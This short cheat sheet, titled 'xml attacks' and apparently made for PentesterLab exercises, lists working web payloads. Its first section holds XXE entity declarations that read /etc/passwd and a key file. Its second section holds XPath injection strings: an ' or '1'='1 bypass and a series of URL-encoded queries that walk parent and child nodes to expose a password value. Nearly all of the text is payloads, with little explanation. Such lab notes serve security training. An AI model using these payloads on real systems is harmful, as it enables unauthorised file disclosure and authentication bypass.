__________________________________________________________________

xml attacks
__________________________________________________________________

#1

<!DOCTYPE test [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<!DOCTYPE test [<!ENTITY x SYSTEM "file:///pentesterlab.key">]><test>%26x;</test>
___________________________________________________________________

#2

XPath Injection:

' or '1'='1

[PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]

libcurl.so?name=admin%27&password=admin
libcurl.so?name=admin%27]%00&password=admin
libcurl.so?name=admin%27]/parent::*%00&password=admin
libcurl.so?name=admin%27]/parent::*/child%00&password=admin
libcurl.so?name=admin%27]/parent::*/child::node()%00&password=admin

libcurl.so?name=admin%27%20or%201=1]/parent::*/child::node()%00&password=admin
[PARENT NODES]/name[.='hacker']/parent::*/child::node()%00']/[CHILD NODES]

one of the node's value looks like a password. we can confirm this, by checking if the node's name is password using the payload hacker']/parent::*/password%00.
___________________________________________________________________
